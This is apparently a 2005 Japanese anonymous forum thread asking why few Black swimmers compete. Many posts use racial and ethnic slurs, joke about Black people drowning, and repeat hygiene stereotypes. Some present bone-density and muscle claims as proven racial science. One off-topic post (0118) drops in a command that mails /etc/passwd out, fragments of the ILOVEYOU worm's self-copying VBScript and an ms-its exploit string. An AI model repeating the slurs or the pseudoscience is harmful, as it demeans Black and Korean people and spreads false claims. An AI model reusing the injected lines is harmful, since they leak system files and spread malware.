X



何故黒人の水泳選手が少ないのか?
0001名無しさん@お腹いっぱい。垢版2005/07/26(火) 13:13:40ID:xAJ5mgFK
説その1、黒人の筋肉は水泳には不向き
説その2、黒人は水泳を練習する環境が少ない。
     白人と同じプールで練習すると白人はプールから出るという

この二つの説がかなり有力なんだけど、他にもなんかあるかな
0003名無しさん@お腹いっぱい。垢版2005/07/26(火) 15:32:16ID:v4B35YtY
>>1
A説が有力と聞いた。結局差別。ゴルフやテニスも同様の差別があったが、
それらの世界ではタイガー・ウッズやウィリアムス姉妹などのスーパースターが登場して
壁が破られつつあるが、水泳はまだ。
はやくスーパースターが登場して差別者をギャフンと言わせてもらいたい。
0004名無しさん@お腹いっぱい。垢版2005/07/26(火) 15:51:38ID:rr0B0Qtj
黒人に水泳は無理。溺れちゃう。
0005名無しさん@お腹いっぱい。垢版2005/07/26(火) 15:53:51ID:rr0B0Qtj
天は二物を与えず。
その典型。
0006名無しさん@お腹いっぱい。垢版2005/07/26(火) 16:03:11ID:uplcesfR
テニスやゴルフ同様、習うのにお金がある程度かかるので
貧困層の多い黒人じゃ、習う事すらできない
>>3にあげてる選手は両親がお金持ち

陸上、野球、アメフト、バスケット、ボクシングはお金あんまりかからないので黒人でもできる
アイスホッケーはお金かかるので、黒人は少ない
こういう、話も聞いた事ある
0007名無しさん@お腹いっぱい。垢版2005/07/26(火) 16:18:59ID:M9A8JMGj
 うんちを手で拭く人は、プールに入れないって規則のせいです。
0008名無しさん@お腹いっぱい。垢版2005/07/26(火) 16:25:23ID:IBod8Oo7
水が汚れるから。
日本の得意競技だけ必死なのに、チョンが少ないのも同じ理由
0009名無しさん@お腹いっぱい。垢版2005/07/26(火) 17:21:15ID:jEftg/0j
>>8が何言ってるかわからない
0011名無しさん@お腹いっぱい。垢版2005/07/26(火) 17:39:02ID:YI92cxWF
あだちけんという作家のエロ漫画で、
巨根すぎて選手を断念したコーチの話があった。。
黒人も、そうなんじゃないの?
でかすぎてパンツに収まりきらないとか。
0012名無しさん@お腹いっぱい。垢版2005/07/26(火) 17:54:26ID:rr0B0Qtj
二十センチ以上なんてザラで凄いのになると三十センチ以上あるからな。
ビキニパンツはちょっと困るだろう。
でも今は繋ぎの水着を男子も着るから大丈夫かも。
0013名無しさん@お腹いっぱい。垢版2005/07/27(水) 00:14:57ID:T5ynVM/H
>>6
練習費用に加えプロになって稼げる金もゴルフやテニスより効率が悪いのかもね。
その上競技生命も長くは無いし。>>1 の説は不明だが、黒人選手の多くは貧困からの脱出が1番の目的だろうから。
0014名無しさん@お腹いっぱい。垢版2005/07/27(水) 01:42:13ID:mZpmsUE/
体脂肪が少ないから沈みやすく苦手
0015名無しさん@お腹いっぱい。垢版2005/07/27(水) 10:26:40ID:U/cieqN9
水泳板の半分以上のスレは水泳やってない人が立ててる気がするw

2バタ予選後の松田か柴田インタビューの時に後ろを黒人選手が通ってたけど、
競技人口の絶対数と、あとは練習環境のせいで、トップにはなれないんだな。
ポテンシャルも大事だけど、技術も多く必要になってくる競技だから。
0016名無しさん@お腹いっぱい。垢版2005/07/27(水) 23:55:52ID:nNz1DVV+
素質と才能派ありそうだがなー環境と差別両方だなー
0017名無しさん@お腹いっぱい。垢版2005/07/28(木) 00:02:51ID:ZQ5UAaOY
昔話題になった人誰だったっけ?
0020名無しさん@お腹いっぱい。垢版2005/07/28(木) 11:07:28ID:IJh7XJzC
>>13 それあるだろうね〜、逆に水泳をやってる黒人は金持ちの子って事かな?
日本だって、プールまでの送り迎え、月謝、それなりにかかるから、
貧乏ではできないよね。
0021名無しさん@お腹いっぱい。垢版2005/07/28(木) 11:16:28ID:o8PvwcZ3
マリア・メテラは無視か?
0023名無しさん@お腹いっぱい。垢版2005/07/28(木) 20:27:02ID:pJCV0tfG
ネスティって純血な黒人じゃないでしょ
黒人の血1/4〜1/2程度しか混ざってなさそう
あと、名前忘れたけど、最近じゃアメリカ男子の400Mリレーのメンバーで
黒人の血が混ざってた人居たと思う。この人も1/4〜1/2程度の混ざり

ベン・ジョンソンみたいな、いかにも黒人ってスイマー居ないかな?
0024名無しさん@お腹いっぱい。垢版2005/07/29(金) 00:57:07ID:KJCDIvA6
タイガーウッズみたいな二ガーが水泳やったら最強だろ。
0025名無しさん@お腹いっぱい。垢版2005/07/29(金) 01:06:43ID:rtAQQfVj
マジレスすると同じ水に入りたくないという白人からの差別。つまり8のレスと同じだが。
差別から黒人自らプールに入らなくなったと考えられる。
0026名無しさん@お腹いっぱい。垢版2005/07/29(金) 01:09:16ID:HKh6wK7v
世界水泳福岡2001で50・100フリーを制したアンソニー・アービンは
黒人の血が入っているよ。
0027名無しさん@お腹いっぱい。垢版2005/07/29(金) 02:17:21ID:JYXa6hcL
アメリカで暮らしてた日本女性(芸能人か何かの有名人(名前忘れた))がテレビで言ってたけど、上流社会のパーティーに招かれて行って皆が入ってるプールに当人が入ったら、他の白人達がサッと一斉にプールから出たと言ってたな。
向こうの上流社会では肌の色の違う東洋人はプールとかで差別を受けるみたい。
0028名無しさん@お腹いっぱい。垢版2005/07/29(金) 09:19:50ID:iiSXUOiE
アメリカの差別は露骨だからね、これが元々階級制度のあるヨーロッパなら
そんな事は少なくとも表だってはない。生まれた時から自分の階級が
決まっているから。アメリカは生まれながらにしてというのがないから、
肌の色で他人と差別したがる。くそだな。アメリカ。
0029名無しさん@お腹いっぱい。垢版2005/07/29(金) 09:54:50ID:dNYXWBMc
差別が悪いのであって、アメリカを恨んじゃいけないよ。
日本も差別者だらけの国だからな。
差別者は死ね。
0030名無しさん@お腹いっぱい。垢版2005/07/29(金) 10:28:02ID:fa7rErhW
日本なんざ
同じ日本国民同士でも
差別あるじゃねえか。
アメリカのことは言えん。
0031名無しさん@お腹いっぱい。垢版2005/07/29(金) 10:46:00ID:ffDXWW/1
俺の通ってるスポーツクラブじゃ、黒人どころか印度人や白人も泳いでるよ。
外大の先生なのかな。
0034名無しさん@お腹いっぱい。垢版2005/07/29(金) 14:59:29ID:iiSXUOiE
差別自体は無い国は無いでしょ。ただ、普通は、金持ち、貧乏、学歴、家柄とかで
ある程度納得がいく。
もっとも肌の色で差別する人ってのは、学歴も、家柄もないドキュンが多いね。

日本は差別の無い方だと思うよ。
0035名無しさん@お腹いっぱい。垢版2005/07/29(金) 15:03:08ID:zOpM2EOc
アメリカ在住のオレの甥っ子、姪っ子は
パブリックのスイムチームで、普通に白人の子達と
泳いでるけど
0036名無しさん@お腹いっぱい。垢版2005/07/29(金) 16:01:50ID:U93/Qvd6
アジアの黒人韓国人が水泳だとどうしたんだってぐらい
しおらしくて非常に見やすい、昔のスポーツ観戦って
こんな感じだったなぁって涙でてきそうだよ。
0037名無しさん@お腹いっぱい。垢版2005/07/30(土) 00:04:39ID:kuxKbGX1
ボブ・サップが水泳やったら最強だろうな(ゲラ
0038名無しさん@お腹いっぱい。垢版2005/07/30(土) 00:36:27ID:l9JQr7tN
50Mも泳げないよ・・
0039名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:08:40ID:v8yEQUX+
>>34
日本も差別はあるでしょ
特に障害者への差別はひど過ぎ。今でも好奇な目で見られるので、家族の人は障害者を外には出せない
後、外国人(特に在日)に対しても見下してる人が多い
0040名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:15:36ID:CSe+51wG
やはり体脂肪少なく沈んでしまうのと差別の両方だろね。
0041名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:17:41ID:mSD7jvJn
黒人差別以外の何者でもない。

日本も差別はあるよ。 どちらかというと世界の中でも差別の多い方だ。
つい数十年前まで殆ど単一民族でやってきたんだから、当然のことではある。

日本でマトモな職につけるのは白人だけ。
中国・韓国あたりの東洋人はわりとマトモな職があるが、その他の
東南アジア人やアラブ人、南アメリカあたりの人たちはあからさま
に差別される。

俺だって寿司職人が黒人だったらなんかイヤだぜw
0042名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:18:12ID:MBl740zw
マジレスすると黒人は他の人種に比べて骨密度高いから骨が重くて水泳に向かないんです。ちなみにシンクロの選手は骨密度低くて骨スカスカだそうです。
0043名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:22:16ID:mSD7jvJn
黒人の肉体的特徴にしたがる奴が多いけど、それはトップスイマーが居ない理由にはなっても
出場者すら居ない理由にはならないぜ。
0044名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:25:18ID:v8yEQUX+
>>42
とは言え、身体能力の高い黒人が本気で水泳を取り組めば、とんでもない世界記録が出ると言う話もあるぞ
0045名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:32:35ID:MBl740zw
骨が重いのを身体能力でカバー出来ればいいんですが骨が重くて体が沈むというのは致命的だと思いますがどうでしょうか??
0046名無しさん@お腹いっぱい。垢版2005/07/30(土) 02:47:52ID:kspp/jVt
黒人の多くが水泳選手になりたいとは思ってないだけなんじゃ?
アメリカじゃ水泳が特別人気あるわけじゃないし。

自分が通うプール(@北米)では
黒人の子もインド人の子もアジア人も普通にレッスン受けたり遊んだりしてるべ。
先生は白人が殆どだけど、特別差別しているような事はない。
0049 ◆HohErJmbN6 垢版2005/07/30(土) 10:20:41ID:QeyroVS+
NY郊外で暮らしていて、
子供達は、エージグループのトップシックスティーンに入っていました。
WASP、いわゆる白人、アングロサクソン、プロテスタントの人たちが多い街
だったので、チームには黒人の子は一人しかいませんでした。
その子、確かにみんなとカープール、つまり送り迎えを交代でやること、
とかはしていなかったね。かわいい女の子だったけど・・。
その当時はモハメドという名前の男の子が速かったけどどうしたかな?
私自身、小さい時イギリスで暮らしていて、プールに入ったら皆が出てしまった経験があります。
40年以上まえですが・・・。
0050名無しさん@お腹いっぱい。垢版2005/07/30(土) 11:24:20ID:Q1zPVXfB
へーおもしろいですね。そんな淑女なあなたがこんな所を見てるってことも。
アメリカは今は大分緩和されているみたいというか
エンターテイメントの部分では逆差別的な現象もありますけど

フランスのスポーツエリートはもう半分以上黒人ってイメージですが。
イギリスはどうなんでしょうね?
ラグビー以外スポーツ自体あんまり強くない感じがしますけど。

0051名無しさん@お腹いっぱい。垢版2005/07/30(土) 13:01:56ID:khAmusBZ
知らんけど、フランスはラグビーも黒人いるの?
球技で言えば世界的傾向としてはサッカーが黒人、ラグビーが白人で
住み分けしている印象なんだが。
個人種目は黒人は陸上で白人は水泳とウインタースポーツ。
アメリカンスポーツではバスケが黒人でアイスホッケーが白人。
アメフトはQBは白人がまだまだ多いみたいね。
大まかなイメージだから例外はいくらでもあると思うけど。
こういう住み分け傾向は差別とか習慣に基づいた環境が理由だと思うよ。
骨密度とか筋肉とかよく聞くけど、なんか疑いたくなるw
0052名無しさん@お腹いっぱい。垢版2005/07/30(土) 13:47:29ID:/lzUL45W
黒人は骨盤が前傾してるから走るのが有利なだけ
走り系以外ではそれほど優位性はない
0053名無しさん@お腹いっぱい。垢版2005/07/30(土) 18:28:21ID:ApNtJDgS
ラグビーは、サッカーと違って、お金を稼ぐためにやるスポーツでは無い(趣味で
やるもの)って事が根底にあると思う。(昔はそうだった)
だから、ラグビーはお金持ちのボンボンがやるスポーツで、貧乏人は
やらなかったし、商業的にもスポンサーがあんまり付いていないのでは?
だからお金がほしい人はサッカーへ流れる。
0054名無しさん@お腹いっぱい。垢版2005/07/31(日) 01:18:01ID:jILU6HkP
NBAのトップ選手で黒人のティム・ダンカンは、学生時代水泳の選手もやっていて、州の代表にもなっていたよ。家は裕福でスクールで習っていたらしい。
進路を決めるときにバスケを選んだのは、差別を受けないことと稼げる金額の桁が違うからだって。
0055名無しさん@お腹いっぱい。垢版2005/07/31(日) 09:05:43ID:dvGMv+5/
比重説を良く見るけど、本当に比重が重い方が水泳に不利なのか?
逆に比重が重い方が有利だと聞いた事があるぞ。
ただ昔の平泳ぎの規定のように、常に頭の一部分を出せとか言われると不利になるらしい。
0056名無しさん@お腹いっぱい。垢版2005/07/31(日) 09:26:26ID:6ajX+MjE
金にならないから。プロ化されてないから。競技施設がないから。

そもそも水泳は「金持ちのスポーツ」なんだよ。 プール設備がなけりゃできないからな。
貧乏な人種には無理。
だから黒人だけでなく、貧困の激しい東南アジアの国にも水泳選手はいない。つーか育たない。

川で泳ぐ競技でもあれば、黒人とか最強だろうな。個人的にはトライアスロンとかを黒人にやってほしいな。
でも自転車を買えないか。

ブラジルとかでは「金持ち」の家庭に産まれれば、そのままカートやってF1目指すわけよ。
「貧乏」な家庭に産まれたら、オレンジを蹴って育ち、そのままサッカー選手を目指すわけ。
まぁどっちもプロになれば金持ちになれるわけだが、F1の場合はレーサーになるまでに莫大な金がかかる。
だから金持ちのスポーツなんだよ。貧乏なヤツはオレンジ蹴ってろってこった。

結局、黒人は川で競泳をやれば最強ってことだな。
0057名無しさん@お腹いっぱい。垢版2005/07/31(日) 16:11:09ID:ZRnL1dSV
二ガーがマジで水泳に進出してきたら日本人なんて1つもメダル取れないだろうね。
0058名無しさん@お腹いっぱい。垢版2005/07/31(日) 16:57:21ID:d2jiQCS5
でも、体格だけでない何かが日本にはあるからね。
全く取れないという事でもないと思うよ。
それより、何で韓国の選手が殆どいないのか? 水泳は不人気?
0059名無しさん@お腹いっぱい。垢版2005/07/31(日) 17:17:22ID:mAoKSeAj
>>58よく嫁貧しい国じゃ無理
      ^^^^^^^
0060名無しさん@お腹いっぱい。垢版2005/07/31(日) 17:36:54ID:kOBkxHXK

黒人が少ないのは筋肉の特性のせいでは?
黒人とは熱帯地方に順化した人種だから冷たい水の中では
力が発揮できないんだろ。

差別とか言っている奴ってアメリカで暮らしたことが無いな。
モハメドアリの時代じゃないんだよw
0061名無しさん@お腹いっぱい。垢版2005/07/31(日) 18:08:12ID:V5onnh05
貧乏かどうかというより国がいかに競技スポーツに投資してるかどうかの違いじゃないの?
ロシアは水泳そこそこ強いし。
0063名無しさん@お腹いっぱい。垢版2005/07/31(日) 23:21:00ID:3dn4KK4m
黒人が水泳

まあタブーだろうなww
偽善者ぶって、設備がどうとか言ってる奴もいるが
ただ単に水が汚れるっていう先入観と、一緒の水には入りたくないっていう
欧米人の差別だろうなwww

0064( ’ ⊇’)垢版2005/07/31(日) 23:28:33ID:2PKVeudC
野口亜季 チルミチル  夜明けの場所に到着!
 _
       /〜ヽ
       (・-・。) 
       o旦c丿 
      Tしし´T

0065名無しさん@お腹いっぱい。垢版2005/08/01(月) 00:17:46ID:keWLQ1c6
>>60
人がいいな。
差別がないわけないだろ
0066名無しさん@お腹いっぱい。垢版2005/08/01(月) 00:36:11ID:jNyehRHr
>>63
世界水泳の短距離の自由形で普通に泳いでいる。
わけのわからんこと書くな。
0067名無しさん@お腹いっぱい。垢版2005/08/01(月) 01:22:36ID:pCp9RHX/
そのわりに、白人が黒人のファッションとか真似るだろ?
知り合いの黒人が白人のそういうところをすごく嫌がってたよ。特に白人の女の子とかね。
「あいつらは、俺たちの文化が好きなだけ。イメージが好きなんだ。
だから俺たちと歩いてみたいだけ」って皮肉ってた。エミネムとかの事も非難してた。ホイッガーってな。
0068名無しさん@お腹いっぱい。垢版2005/08/01(月) 01:27:17ID:wRCR3bj0
>>57
そう思うんなら黒人スイマー達育て上げて数々の国際レース制覇させればいいじゃないか
いいビジネスになるぞ
0069名無しさん@お腹いっぱい。垢版2005/08/01(月) 02:47:23ID:qm366mar
水泳ヤッテモダメ 金ニナラナイヨ!サッカー一番
0070名無しさん@お腹いっぱい。垢版2005/08/01(月) 02:54:05ID:UJ0DQhGx
これ、少ないってか完全な黒人選手っていないに等しいだろ
ぶっちゃけ筋肉云々以前に差別や練習環境の問題だろな
0071名無しさん@お腹いっぱい。垢版2005/08/01(月) 04:19:11ID:yah4vtGJ
黒人の大富豪さんが、黒人向けのプールを作ってあげたらいいのにね
けど、黒人の大富豪さんに限ってケチが多い
0072名無しさん@お腹いっぱい。垢版2005/08/01(月) 04:57:47ID:MWQS0OoM
ウイッキさんがんがれ!
0073亀太郎垢版2005/08/01(月) 05:50:40ID:Lw3a8+P/
いつも行ってるジムのプール、黒人のおっちゃんがマシンで汗だくになったまの格好でプールにザブンと入る。何故上だけでも脱がないのか、シャワー浴びないのか不明。
0074名無しさん@お腹いっぱい。垢版2005/08/01(月) 14:11:58ID:N9GardSA
67
ホイッガーって何?
0075名無しさん@お腹いっぱい。垢版2005/08/01(月) 14:20:15ID:0eW5b9b3
ホワイトニガーだろ
0076名無しさん@お腹いっぱい。垢版2005/08/01(月) 14:30:00ID:N9GardSA
どうも。ホワイトニガーか…
0077名無しさん@お腹いっぱい。垢版2005/08/01(月) 14:34:22ID:FGMqNh50
1金にならない
2環境
   ・
   ・
3筋肉が不向き

でしょうな。
007867垢版2005/08/01(月) 15:46:00ID:pCp9RHX/
>>74
その黒人いわく、WhiteとNiggerを合わせた言葉で、Whiggerと綴り
黒人になりたがる白人の意味で、黒人同士で言われるスラングだそうです。
辞書には載ってませんね。しょっちゅう言ってましたよ、女にも男にも。
0079名無しさん@お腹いっぱい。垢版2005/08/01(月) 15:53:00ID:FhJyn1rk
>>74
ライス国務長官のことだ
0080名無しさん@お腹いっぱい。垢版2005/08/01(月) 18:40:07ID:3MA5krC3
経済的な理由で、黒人が少ないとはよく聞くが・・・
クラシック音楽、フィギュアスケート、などもお金がかかると思うが、少しずつ黒人が増えてきていますよね。
でも、水泳の場合は、ほとんどいない。

経済的理由で、いないにしては、いなさすぎるのではないだろうか。
水泳で大成してもお金にはならない、という見方もあるが、それにしても、もう少しいてもいいのではないか。
陸上は黒人ばかり、水泳はほとんどゼロに等しい。
とすると、やはり肉体的な理由が大きいのではないか・・・
あ、77さんがすでに言ってますな。すまん。
0081名無しさん@お腹いっぱい。垢版2005/08/01(月) 20:43:27ID:VajKYUru
>>78
渋谷のレコ村にいっぱいいる、
あぽーんなラッパー兄ちゃん達は、何て言うんだ?
YellowとNiggerで
イエガーか?
0082名無しさん@お腹いっぱい。垢版2005/08/01(月) 22:25:38ID:EpHwpiTe


「経済的理由」ってねぇ・・。水泳ってそんなに金がかかるの?
アメフトや野球と比較して?考えてしゃべりましょうよw

頭の中までカエルですか?
008382垢版2005/08/01(月) 22:32:54ID:EpHwpiTe

もちろん金のために野球やアメフトをやるって人もいると思うけどねぇ。
そりゃごく一部だろ。何か生理的肉体的原因があるんじゃない?
0084名無しさん@お腹いっぱい。垢版2005/08/01(月) 23:42:36ID:9iw3Ky79
競技をやる側じゃなくて、施設の運営・維持などでは野球やアメフトの比じゃないお金がいる。
008567垢版2005/08/02(火) 00:02:48ID:2rrRZdaq
>>81 ああいうの終わってるよね‥
日本国内だけでまるで自分たちが最先端のようにえばってふるまってる、所詮黒人のパクリR&Bやラップもどきも
日本じゃないけど、韓国の女のグループだったかな?SENSだかなんだか横文字の
その人達と会った事があるらしくて、彼女らはみんなホイッガーだった、って苦笑してたよ
真っ赤な車が似合うのは黒人ならではだ
たしか黒人、黒人と日本人のハーフの事をブラッカニーズって呼んでたよ Blackaneseって綴るんだと思う
0086名無しさん@お腹いっぱい。垢版2005/08/02(火) 00:12:31ID:I+Cru2uc
>>82
水泳は科学の進歩した国ほど強い
0087名無しさん@お腹いっぱい。垢版2005/08/02(火) 00:53:49ID:Eo6JXO51
たぶんプールに入ると色素が抜けるんだよ
マイケルジャクソンが白くなったのもプールのせいだろう
0088名無しさん@お腹いっぱい。垢版2005/08/02(火) 01:03:09ID:v0TIIGoR
↑面白いなー
0090名無しさん@お腹いっぱい。垢版2005/08/02(火) 09:17:04ID:yb9bpiUU
黒人圏にはプールないとでも思ってるのか?

やってもたいして金にならないから本気で取り組まないってのはあるかもしれないけど、
それはある程度までの速さがあってのことでしょ。
不向きじゃないならジュニアの大会の上位に黒人たくさんいたっておかしくないじゃん。
0091名無しさん@お腹いっぱい。垢版2005/08/02(火) 09:27:42ID:QRfoe2yp
黒人は運動何やらせても一番優れてるとか言ってる人、本気で言ってるの?
チーターは泳いでも一番速い?
0092名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:20:14ID:0/fHuhGp
だから差別とか金にならないからとかじゃなくて骨が重いから水泳には向かないんだって!金にならんとか言ってるけどイアン・ソープは年間7億ぐらいは稼いでるだろ。
0093名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:30:26ID:g/e436Wq
水は贅沢品だからね。
20世紀のイデオロギーにかわって21世紀は水が対立軸になる
という指摘もある。
飲める程キレイな水でジャブジャブ泳ぐ競技が成立する国は
そうたくさんある訳でもないはず。
水泳を行う習慣のある国で持続的に水泳施設の維持が出来て、
その地域に住む類い稀なる競技力をもつ黒人がもっと金を稼げる
スポーツではなくわざわざ水泳を選択した場合に限って、
トップ選手が出てくると思われます。

環境説に一票。
 
0094名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:31:30ID:0CmOge8e
>>87
塩素漂白かよっ!
0095名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:36:11ID:ntStIIOE
アフリカ勢は陸上強すぎだから
環境が改善されれば水泳も
アフリカ勢だらけになると思われ
0096名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:42:19ID:0/fHuhGp
環境うんぬん言うならば何故アメリカにはあんなに黒人いるのに水泳選手いないの?アメリカは環境整ってるだろ?身体能力が優れてる黒人にアメリカの水泳指導者が手出さないのはなんでだ?肉体的に水泳に向かない欠点があるからじゃないのか?
0097名無しさん@お腹いっぱい。垢版2005/08/02(火) 10:49:54ID:G+oLjtSa
黒人は陸上強い→その選手に憧れた同人種の子供が陸上を始める・・ってカンジなんじゃないかい? オーストラリアから途切れずにトップスイマーが生まれるのと同様に自国の英雄に憧れて・・とゆー図式。ホントの所は分からんですが。。
0098名無しさん@お腹いっぱい。垢版2005/08/02(火) 11:19:09ID:Rb6h7tlF
ruerw
0099名無しさん@お腹いっぱい。垢版2005/08/02(火) 13:17:49ID:g/e436Wq
>96
アフリカ系に人気があるのが水泳より稼げるバスケ・アメフト・
野球・陸上だからじゃない?
黒人スター選手の先駆者がいるし。
アメリカを尺度に黒人不向きを唱えるのは無理があると思う。
なんせアメリカ代表は欧州系白人ばかりのように見えたけど、
この人達はたしかアメリカ人口の十数%程度でしょ。
多数派のヒスパニック、それにアジア系がいないのが水泳に
不向きな人種だからと言えてしまう。
では日本人も不向き?
むしろスポーツ環境が富裕層少数派白人の隙間産業だからと
言われた方がまだ納得できる気がするんですが。
010067垢版2005/08/02(火) 13:21:24ID:2rrRZdaq
知り合いの黒人は、ビーチに行くって行ってたから
泳ぐの?って聞いたら、「いや、あまり泳がない。僕たちブラックはあまり泳がないね」って言うから
そいつ嫌な事でもはっきり言うタイプの性格だから「何で?」と聞いたら
「なぜだか知らないが、ブラックはみんな泳がないよ。…俺浮かないんだわ」
って言ってた。最後の一言が気になる
010167垢版2005/08/02(火) 13:26:38ID:2rrRZdaq
「僕はニガーだから生まれつきとても日焼けしてるんだ」って言ってたくらいだから
ビーチに一体何をしに…?と思ったが
0102名無しさん@お腹いっぱい。垢版2005/08/02(火) 13:54:49ID:0/fHuhGp
99さん アメリカを尺度に考えてる訳ではないですよ。アフリカが環境が整ってないからって話があったから環境が整ってるアメリカで何故黒人のトップスイマーがいないの?って言ったんです。
0103名無しさん@お腹いっぱい。垢版2005/08/02(火) 14:02:04ID:0/fHuhGp
水泳の事を知ってる人間ならば黒人は骨が重く水に浮きにくく水泳に向かないっていうのは誰でも知ってる事だと思いますが。
0106名無しさん@お腹いっぱい。垢版2005/08/02(火) 23:19:17ID:I+Cru2uc
日本が野球、韓国がサッカーというように
国民的スポーツかどうかの違いだと思うけど。
あと競技人口少なくてもいきなりメダリストが出ると憧れる子供が出てきて
競技人口が増すし、国が施設にも力を入れるようになる。
日本が水泳人口が多いのは戦後の古畑広之進の成果じゃないのかな。

>>96
人種によって生活する地域が違うからなぁ。黒人しかいない学校には
プールはないのかも?ただ白人しかいない学校でもプールがあるとは
限らない。日本の子供の方が水泳やってる子は多いよ。
0107名無しさん@お腹いっぱい。垢版2005/08/02(火) 23:44:29ID:IRGu9sPT
アメリカの学校は日本みたいに必ずプールがあるわけじゃ
ないみたいだね。
会員制のクラブに入るにはお金もいるしそれなりに裕福じゃないといけない。
昔は黒人は水に浮きにくいってガセを理由に入会拒否されたり
したらしいよ。白人が同じ水につかりたがらないせいでね。
0108アメリカ在住半年垢版2005/08/03(水) 00:39:25ID:h0yoAsiV

ただね、「差別」なんて簡単に割り切れるもんではないよ。

黒人はタフだ。例えば腐りかけた牛乳でも彼らは平気。でも
もちろん日本人や白人はそんなものを飲んだら30分で下痢ピーだ。
衛生の基準が違う。それは感覚の違いだから説明しても無駄。
結局別々に暮らそうってことに自然になる。

日本では世間知らずで役立たずサヨクあたりが、「黒人は被害者」
みたいなとらえ方をするけどそんな単純な問題ではないよ。
プールに関しては俺は行ったことがなかったから知らないが。
0109名無しさん@お腹いっぱい。垢版2005/08/03(水) 01:24:31ID:r+g+w91h
こいつらはどうしても黒人差別のせいにしたいのね。
0110名無しさん@お腹いっぱい。垢版2005/08/03(水) 01:50:34ID:JT/eKUzM
筋肉の比重が重いからでしょ
0111名無しさん@お腹いっぱい。垢版2005/08/03(水) 03:15:34ID:Z/msv5wy
黒人のいない競泳は陸上にくらべ楽でいいよな それでいてメダルの価値は同じレベル扱いかよ
0112名無しさん@お腹いっぱい。垢版2005/08/03(水) 03:21:35ID:gRVX2cI6
黒人で泳いでる人いるけど速くないのはなんでだ?
そんなに肉体的に有利だっていうんなら速いはずだろ
不向きだから遅い説に一票
0113名無しさん@お腹いっぱい。垢版2005/08/03(水) 07:32:48ID:BF2FRLbB
施設に金がかかるって、アフリカにも海とか川とかあるだろ。
魚食わない訳ないし、漁師やってる奴も普通にいるだろ。

シドニー五輪で溺れそうな泳ぎで感動を与えたとか言われてたムサンバニの
赤道ギニアも思いっきり海に面してる。当然、海辺には難無く泳げる人間が
幾らでもいるだろう。クロールではないかもしれないが。
実際、国の体育関係者がテキトーに運動得意な大学生にやらせた、という話だったけど。
ああいう国の大学生って貴族階級みたいなもんだろうし。
黒人差別なんて比較にならない様なものの成れの果てに「世界が感動」。
0114名無しさん@お腹いっぱい。垢版2005/08/03(水) 09:02:40ID:gFrFyv0B
アメリカ人の高校生って、高校でスポーツやるのも、オーケストラやるのも、
ボランティアやるのも、大學進学とその奨学金のためってかんじだからね。
日本と違って、書類とSATのスコアだけで、大學合否が決まるからね。

だから余裕がある親は、子供に何かスポーツをやらせる。
スケート、アイスホッケー、水泳、テニスなど。
これらは、家の芝生とかでは練習できないので、チームに入らなければならない。
それなりに、お金はかかるし、かならず送り迎えが必要。
アケリカ広いし、公共の交通機関がいまいちだからね。

野球やアメフト、バスケなら家の近所でできるから、
黒人の子たちが秀でるような気がする。
0115名無しさん@お腹いっぱい。垢版2005/08/03(水) 10:11:43ID:xVja+gLC
黒人は水泳に不向きどころか殆ど泳げない。
すぐに溺れてしまう。
黒人選手が水泳を凌駕する事は現時点では有り得ない。
0116名無しさん@お腹いっぱい。垢版2005/08/03(水) 12:03:36ID:gRVX2cI6
>>114
まるで黒人に金持ちはいないような言いっぷりですね
0117名無しさん@お腹いっぱい。垢版2005/08/03(水) 14:33:07ID:60oH35R7
よく憶えていないんだが、以前陸上競技の黒人選手の進出についてのドキュメンタリー番組をみたことがある。
良くも悪くもロサンゼルスオリンピックがスポーツの転換点であったこと。
有名な話だが経済効果ね。
この時のスター選手であったカールルイスが陸上競技がビジネスとして成立するようしたので
多くの黒人選手がプロとして成立し活躍できるようになったらしい。
モスクワ以前ってどんなんだったのかな?

競泳もそいった環境ができれば変わってくるんでない。
0118名無しさん@お腹いっぱい。垢版2005/08/03(水) 15:52:37ID:IRynWahX
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT
0119名無しさん@お腹いっぱい。垢版2005/08/03(水) 20:09:59ID:vsU4hB+M
休日にホストファミリーの子供達と車で30分くらいのプールに行ったけど
ガラガラだった。アメリカ人はあんまり競泳プールは好きじゃないのかも。
プールが着いてるアパートメントでまったりするのが好きなのかな。
0120名無しさん@お腹いっぱい。垢版2005/08/03(水) 22:20:07ID:IXptn4iv
1.黒人の体は(筋肉、骨)は水泳にむかない
2.白人の差別により、黒人はプールで泳ぐ環境が少ない
3.黒人は、金にならない水泳はやらない

今あがってる理由はおおまかに3つ
やたら、1の説を押し付けてる人がいるけど根拠は今だにないよ
1や2は誰でも一度は聞いた事はあるっしょ
その時に、その話を信じたか?、疑ったか?の違いでしょうね
0121名無しさん@お腹いっぱい。垢版2005/08/04(木) 00:41:28ID:v2l9TQBk
>>111
世界水泳でセネガルだのなんだのって一応出てますた。
でも漏れより遅いかも。
0122名無しさん@お腹いっぱい。垢版2005/08/04(木) 01:24:39ID:j7GnDVf2
120さん 根拠も何も医学的に証明されてますよ。差別や貧困に原因があるっていうのはちょっと無理があるのでは?差別などで昔プールに入れなかったというのはあるかもしれませんが現代じゃちょっとね…
0123名無しさん@お腹いっぱい。垢版2005/08/04(木) 02:26:52ID:EKQkASvH
>>122
医学的にも、証明はされてないですよ
この説を信じてる人の多くは
小学校〜高校あたりの学校の先生から、
Aくん「先生何故、黒人の水泳の選手は居ないの?」
先生「それはね、黒人は水泳にはむかないの。筋肉、骨、比重その他〜が駄目」

学校の先生の話だから、本当と信じ込んでる人が多数
先生も見栄があるし、「知らない」とは言えないでしょう
ネット検索しても、学校の先生から黒人は水泳にはむかないって聞いた。ってのがよく出る
